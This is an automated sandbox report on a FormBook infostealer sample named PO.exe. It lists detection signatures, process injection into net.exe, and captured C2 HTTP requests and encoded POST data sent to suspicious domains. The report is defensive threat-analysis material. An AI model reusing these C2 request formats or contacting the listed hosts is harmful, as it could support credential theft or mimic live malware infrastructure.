Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO.exe

Overview

General Information

Sample name:PO.exe
Analysis ID:1612356
MD5:351a691669abf4dcbdb3f393b2f3e183
SHA1:c6a72eb864082996d4673185fe89bf45ebea6f7b
SHA256:7b6dbf313708726318645aa72ecabe962572e8008214dffab03c151012c2df68
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\PO.exe" MD5: 351A691669ABF4DCBDB3F393B2F3E183)
    • PO.exe (PID: 5012 cmdline: "C:\Users\user\Desktop\PO.exe" MD5: 351A691669ABF4DCBDB3F393B2F3E183)
      • vfAu7gBmmnuGpQ5Y.exe (PID: 3220 cmdline: "C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\lp0hQtG6P0.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • net.exe (PID: 7120 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • vfAu7gBmmnuGpQ5Y.exe (PID: 5580 cmdline: "C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\7Qeewu5lIKK.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 3260 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            2.2.PO.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.PO.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T18:53:42.065591+010028596221Exploit Kit Activity Detected104.21.35.20880192.168.2.450022TCP
                2025-02-11T18:53:44.839098+010028596221Exploit Kit Activity Detected104.21.35.20880192.168.2.450023TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: PO.exeVirustotal: Detection: 69%Perma Link
                Source: PO.exeReversingLabs: Detection: 67%
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3001987219.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003697143.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2274480081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3003263592.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275144613.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3003792289.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3003894654.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2276815153.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: PO.exeJoe Sandbox ML: detected
                Source: PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: net.pdbUGP source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO.exe, PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: net.pdb source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002681126.000000000097F000.00000002.00000001.01000000.0000000C.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3002866033.000000000097F000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0043C680 FindFirstFileW,FindNextFileW,FindClose,7_2_0043C680
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax7_2_00429E40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then pop edi7_2_0042E248
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h7_2_00AC04E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.35.208:80 -> 192.168.2.4:50022
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.35.208:80 -> 192.168.2.4:50023
                Source: DNS query: www.erectus.xyz
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTb HTTP/1.1Host: www.cloud-kuprof2.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb HTTP/1.1Host: www.erectus.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb HTTP/1.1Host: www.fineitemrealm.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTb HTTP/1.1Host: www.globalcase.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cloud-kuprof2.click
                Source: global trafficDNS traffic detected: DNS query: www.erectus.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fineitemrealm.shop
                Source: global trafficDNS traffic detected: DNS query: www.globalcase.website
                Source: global trafficDNS traffic detected: DNS query: www.adjokctp.icu
                Source: unknownHTTP traffic detected: POST /cjko/ HTTP/1.1Host: www.erectus.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USCache-Control: no-cacheContent-Length: 201Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.erectus.xyzReferer: http://www.erectus.xyz/cjko/User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36Data Raw: 39 32 74 44 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 32 4a 35 66 63 59 41 41 56 57 59 6f 50 62 67 6a 63 67 63 46 39 48 6e 6f 56 6c 6c 35 36 63 58 4e 4f 59 7a 54 46 70 65 59 66 4a 57 66 74 30 4f 4b 53 6f 38 55 41 77 59 38 41 6f 43 45 43 35 64 5a 42 4c 49 4a 31 4d 6a 77 69 2b 54 6e 54 52 38 4f 73 4f 5a 31 63 4f 6d 73 58 7a 43 4d 32 65 4e 4d 66 67 54 6d 63 6c 49 32 50 36 64 61 30 46 78 44 37 53 42 32 31 6d 6f 68 6f 45 76 73 6f 61 72 50 4d 69 66 53 43 43 73 51 4b 50 6c 68 44 2b 38 43 64 47 7a 31 31 74 79 6e 4b 72 4f 62 4a 38 6d 43 44 4e 4e 6b 42 42 4f 75 69 78 43 6f 57 62 69 50 67 4b 54 58 63 41 3d 3d Data Ascii: 92tD=6ihTbDU3+TJ32J5fcYAAVWYoPbgjcgcF9HnoVll56cXNOYzTFpeYfJWft0OKSo8UAwY8AoCEC5dZBLIJ1Mjwi+TnTR8OsOZ1cOmsXzCM2eNMfgTmclI2P6da0FxD7SB21mohoEvsoarPMifSCCsQKPlhD+8CdGz11tynKrObJ8mCDNNkBBOuixCoWbiPgKTXcA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 11 Feb 2025 17:52:46 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: W/"49d-614139f7d9e8f"Content-Encoding: gzipData Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc f3 85 33 f5 8e 19 af 8e 19 47 a3 eb cb eb 9b 31 64 a2 5c 4b cd e1 b2 5f 6c a1 5f 7f c7 f5 03 78 6e f1 70 1a ce 2e a6 e7 e1 6b 0b d0 79 38 68 c0 a0 5f 8b 34 81 0a e5 3a 25 6e 6f a6 92 31 28 24 6b ce 35 85 88 a5 5e 73 70 bd 1a b8 97 f7 ce 1b f9 81 fd 1d e9 17 f0 5c c9 84 52 3e 6c 69 7f bf 6b 47 e0 2a 5c 11 17 4f 94 8f bb 40 d9 68 37 91 3d 86 f2 82 c3 b0 be e7 41 21 91 9b ff a2 71 60 14 5c 49 fd ed f0 6e c3 b3 f3 e1 c5 f5 2b c0 46 d6 cd 92 bc 89 11 31 c9 0d be 09 49 f3 0d 96 7f 41 f8 ac 69 37 3b 7c ac 1d 1d bf ee af ae 13 53 2f 58 3c 2c e6 b3 fb 70 16 da bc b7 0f 0f 82 7f 35 b3 45 0f 3a b4 7d b9 43 f3 ce 15 0a 83 cd 50 58 e3 40 a9 6d 74 8c 53 2d 63 a1 6c 79 51 e4 25 41 82 85 28 29 b3 8f da eb 3c 36 1c 3e 6b ad f9 cd 1c 06 27 bf 00 dc 27 15 ee 9d 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: W/"49d-614139f7d9e8f"Content-Encoding: gzipData Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc f3 85 33 f5 8e 19 af 8e 19 47 a3 eb cb eb 9b 31 64 a2 5c 4b cd e1 b2 5f 6c a1 5f 7f c7 f5 03 78 6e f1 70 1a ce 2e a6 e7 e1 6b 0b d0 79 38 68 c0 a0 5f 8b 34 81 0a e5 3a 25 6e 6f a6 92 31 28 24 6b ce 35 85 88 a5 5e 73 70 bd 1a b8 97 f7 ce 1b f9 81 fd 1d e9 17 f0 5c c9 84 52 3e 6c 69 7f bf 6b 47 e0 2a 5c 11 17 4f 94 8f bb 40 d9 68 37 91 3d 86 f2 82 c3 b0 be e7 41 21 91 9b ff a2 71 60 14 5c 49 fd ed f0 6e c3 b3 f3 e1 c5 f5 2b c0 46 d6 cd 92 bc 89 11 31 c9 0d be 09 49 f3 0d 96 7f 41 f8 ac 69 37 3b 7c ac 1d 1d bf ee af ae 13 53 2f 58 3c 2c e6 b3 fb 70 16 da bc b7 0f 0f 82 7f 35 b3 45 0f 3a b4 7d b9 43 f3 ce 15 0a 83 cd 50 58 e3 40 a9 6d 74 8c 53 2d 63 a1 6c 79 51 e4 25 41 82 85 28 29 b3 8f da eb 3c 36 1c 3e 6b ad f9 cd 1c 06 27 bf 00 dc 27 15 ee 9d 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: W/"49d-614139f7d9e8f"Content-Encoding: gzipData Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc f3 85 33 f5 8e 19 af 8e 19 47 a3 eb cb eb 9b 31 64 a2 5c 4b cd e1 b2 5f 6c a1 5f 7f c7 f5 03 78 6e f1 70 1a ce 2e a6 e7 e1 6b 0b d0 79 38 68 c0 a0 5f 8b 34 81 0a e5 3a 25 6e 6f a6 92 31 28 24 6b ce 35 85 88 a5 5e 73 70 bd 1a b8 97 f7 ce 1b f9 81 fd 1d e9 17 f0 5c c9 84 52 3e 6c 69 7f bf 6b 47 e0 2a 5c 11 17 4f 94 8f bb 40 d9 68 37 91 3d 86 f2 82 c3 b0 be e7 41 21 91 9b ff a2 71 60 14 5c 49 fd ed f0 6e c3 b3 f3 e1 c5 f5 2b c0 46 d6 cd 92 bc 89 11 31 c9 0d be 09 49 f3 0d 96 7f 41 f8 ac 69 37 3b 7c ac 1d 1d bf ee af ae 13 53 2f 58 3c 2c e6 b3 fb 70 16 da bc b7 0f 0f 82 7f 35 b3 45 0f 3a b4 7d b9 43 f3 ce 15 0a 83 cd 50 58 e3 40 a9 6d 74 8c 53 2d 63 a1 6c 79 51 e4 25 41 82 85 28 29 b3 8f da eb 3c 36 1c 3e 6b ad f9 cd 1c 06 27 bf 00 dc 27 15 ee 9d 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Feb 2025 17:53:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1181Connection: closeVary: Accept-EncodingLast-Modified: Wed, 20 Mar 2024 08:46:13 GMTETag: "49d-614139f7d9e8f"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 